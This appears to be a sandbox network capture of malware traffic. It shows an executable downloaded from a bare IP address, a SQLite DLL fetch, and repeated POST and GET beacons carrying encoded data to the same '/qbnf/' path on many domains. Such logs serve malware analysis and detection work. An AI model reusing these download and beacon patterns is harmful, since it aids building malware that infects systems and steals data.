Network Analysis

GET /210/wlanext.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 23.95.235.10 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 29 Nov 2023 05:24:15 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 Last-Modified: Tue, 28 Nov 2023 06:55:30 GMT ETag: "adc00-60b30e7795377" Accept-Ranges: bytes Content-Length: 711680 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

POST /qbnf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.vaultedjewelry.com Origin: http://www.vaultedjewelry.com Referer: http://www.vaultedjewelry.com/qbnf/ Cache-Control: no-cache Content-Length: 177 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 405 Not Allowed date: Wed, 29 Nov 2023 05:24:55 GMT content-type: text/html content-length: 154 server: NginX connection: close

GET /qbnf/?i09Z8uP_=rgPWpHOmxKlSe7EHONYdVBrmOnLu4eF6eOSzvd7TZo3R3Fo4Dd2XRg3DbQYqSiNd5R8WYW2HfYo1oy4LJvVB6tvZDWfBfjfjeCKWam8=&pq4=B_bUHOuV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.vaultedjewelry.com Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 200 OK date: Wed, 29 Nov 2023 05:24:58 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_mXvFQ/5cNN8BMifkte+fohlrIVT6ZaJ1PDbitgQbCnh+YZZT6y3P57XYLZJdS+T/JMtwb/NTPMaCBPVbqR4jNg== last-modified: Wed, 29 Nov 2023 05:24:58 GMT x-cache-miss-from: parking-698fb476bf-g877q server: NginX connection: close

GET /2020/sqlite-dll-win32-x86-3310000.zip HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: www.sqlite.org Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Date: Wed, 29 Nov 2023 05:25:00 GMT Last-Modified: Sun, 26 Jan 2020 18:03:34 GMT Cache-Control: max-age=120 ETag: "m5e2dd476s791e6" Content-type: application/zip; charset=utf-8 Content-length: 496102

POST /qbnf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.mr-u-taste.com Origin: http://www.mr-u-taste.com Referer: http://www.mr-u-taste.com/qbnf/ Cache-Control: no-cache Content-Length: 189 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 404 Not Found Cache-Control: no-cache Content-Type: text/html Server: Apache X-Frame-Options: SAMEORIGIN X-XSS-Protection: 0 Set-Cookie: _d_id=6732490e430e639a1d12a89c6cbe69; Path=/; HttpOnly Date: Wed, 29 Nov 2023 05:25:15 GMT Connection: close Content-Length: 1163

GET /qbnf/?i09Z8uP_=mGR7ZmLmEt9yNzhj107em99ZnYgpgTedSLqstOtysWtmmDPutWYGQHPP7A/bNBdhcJI+eHBY4GrszbL+CPnGOgwl8ziMxMmXJyanig0=&pq4=B_bUHOuV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.mr-u-taste.com Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 404 Not Found Cache-Control: no-cache Content-Type: text/html Server: Apache X-Frame-Options: SAMEORIGIN X-XSS-Protection: 0 Set-Cookie: _d_id=673b490e430e636bca09a89c6cbe69; Path=/; HttpOnly Date: Wed, 29 Nov 2023 05:25:17 GMT Connection: close Content-Length: 1163

POST /qbnf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.brightpathtechgroups.top Origin: http://www.brightpathtechgroups.top Referer: http://www.brightpathtechgroups.top/qbnf/ Cache-Control: no-cache Content-Length: 189 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 404 Not Found Date: Wed, 29 Nov 2023 05:25:23 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html

GET /qbnf/?i09Z8uP_=/XY8b2QuaMdFC0XpCgsh4GNYF4+K1Jee0ur1wuthWP34gEpbfUtO61S+Wmzh4wGYwfcaHPs6UkqbWuaiX2goUA52btrwqIRWjk6Aczs=&pq4=B_bUHOuV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.brightpathtechgroups.top Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 404 Not Found Date: Wed, 29 Nov 2023 05:25:26 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8

POST /qbnf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.saudiarabia-invest.com Origin: http://www.saudiarabia-invest.com Referer: http://www.saudiarabia-invest.com/qbnf/ Cache-Control: no-cache Content-Length: 189 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 404 Not Found Date: Wed, 29 Nov 2023 05:25:32 GMT Server: Apache/2.4.58 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1

GET /qbnf/?i09Z8uP_=TQw86TlhZOZGhyrotGnGA9O38tw4CjcNLRp/p2VP3ufYpIvUmIv9kKzVdrLDClRgTF6URTvKEK1oO5gHY3jB8uOZGTzekB90rbc1k/w=&pq4=B_bUHOuV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.saudiarabia-invest.com Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 404 Not Found Date: Wed, 29 Nov 2023 05:25:35 GMT Server: Apache/2.4.58 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1

POST /qbnf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.luciengeorge.com Origin: http://www.luciengeorge.com Referer: http://www.luciengeorge.com/qbnf/ Cache-Control: no-cache Content-Length: 189 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 301 Moved Permanently Server: Cowboy Date: Wed, 29 Nov 2023 05:25:40 GMT Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701235541&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=e%2FCNhTdxR0RiZG87zothDCHqhgUMur5LMoNfBr7VQr4%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701235541&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=e%2FCNhTdxR0RiZG87zothDCHqhgUMur5LMoNfBr7VQr4%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: close Cache-Control: max-age=3600 Content-Type: text/html Location: http://www.lucien.dev/qbnf/ Content-Length: 214 Via: 1.1 vegur

GET /qbnf/?i09Z8uP_=0c7pTBUgqi7uIFOYjbT3SYstx1V9f1GJj9bVxgDbtFRASgICtVyP8zh8VQdSKB3ZTDJ9NwSYp2xAsrB2eli3KEKVX/ICehpktcwDvSA=&pq4=B_bUHOuV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.luciengeorge.com Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 301 Moved Permanently Server: Cowboy Date: Wed, 29 Nov 2023 05:25:43 GMT Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1701235544&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=hoUHNMXcJhUCOKkywHpTvfvhcjD%2BOGRmYf%2FXtCvtM3A%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1701235544&sid=812dcc77-0bd0-43b1-a5f1-b25750382959&s=hoUHNMXcJhUCOKkywHpTvfvhcjD%2BOGRmYf%2FXtCvtM3A%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: close Cache-Control: max-age=3600 Content-Type: text/html Location: http://www.lucien.dev/qbnf/?i09Z8uP_=0c7pTBUgqi7uIFOYjbT3SYstx1V9f1GJj9bVxgDbtFRASgICtVyP8zh8VQdSKB3ZTDJ9NwSYp2xAsrB2eli3KEKVX/ICehpktcwDvSA=&pq4=B_bUHOuV Content-Length: 341 Via: 1.1 vegur

POST /qbnf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.brucesalyers.com Origin: http://www.brucesalyers.com Referer: http://www.brucesalyers.com/qbnf/ Cache-Control: no-cache Content-Length: 189 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 405 Not Allowed date: Wed, 29 Nov 2023 05:25:49 GMT content-type: text/html content-length: 154 server: NginX connection: close

GET /qbnf/?i09Z8uP_=pOaW0U2I6Oim8KKUbDqJDQhYI0+jOGca0ZkB2ClPUoj3GtGVG9J/gqWS9Mz6XkgBxNiuWxxBos74OtAK1fVYBccuSwjN1UL6AWuKPcU=&pq4=B_bUHOuV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.brucesalyers.com Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 200 OK date: Wed, 29 Nov 2023 05:25:52 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_I3jbaBChsGNfOSvL2I83fMPOTse216ZnQhVKqLDPQ3gu7pGszXhUogbIH03ePSd9/n+0OCnpWatRKAqbruS4fA== last-modified: Wed, 29 Nov 2023 05:25:52 GMT x-cache-miss-from: parking-698fb476bf-cmbck server: NginX connection: close

POST /qbnf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.54c7pv.top Origin: http://www.54c7pv.top Referer: http://www.54c7pv.top/qbnf/ Cache-Control: no-cache Content-Length: 189 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 200 OK Server: nginx Date: Wed, 29 Nov 2023 05:25:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip

GET /qbnf/?i09Z8uP_=R40TEU5sRsOQoxxitOES9+hMTVh8b1wg2WgWpjzQt3scLF2RQpMS0y827zix4QRv7SCVfpbDXNdzS1tGlHHYZLiaPpoCE6jYgQr1YbY=&pq4=B_bUHOuV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.54c7pv.top Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 200 OK Server: nginx Date: Wed, 29 Nov 2023 05:26:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding

POST /qbnf/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.infinite-7.com Origin: http://www.infinite-7.com Referer: http://www.infinite-7.com/qbnf/ Cache-Control: no-cache Content-Length: 189 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 405 Not Allowed date: Wed, 29 Nov 2023 05:26:06 GMT content-type: text/html content-length: 154 server: NginX connection: close

GET /qbnf/?i09Z8uP_=+6BF5kLU84F0bZC4snN7O//5RGhAAZcl02SXjZ/C8WDlleVZNjPdMeMs0Bth8cY5eBWoVtOkuOGyDcUeP7JOiDQXP7lXIFXFwa8Se1E=&pq4=B_bUHOuV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.infinite-7.com Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53

HTTP/1.1 200 OK date: Wed, 29 Nov 2023 05:26:09 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_LUgVdeiBV7VVzmBrZ3raZH5UAAHSy0m6ONx2BOK9CZ5ZuV0vt+CGjsUFvWqwSIWmug16+ef0yBLS3DC3+SrAnw== last-modified: Wed, 29 Nov 2023 05:26:09 GMT x-cache-miss-from: parking-698fb476bf-lvhcl server: NginX connection: close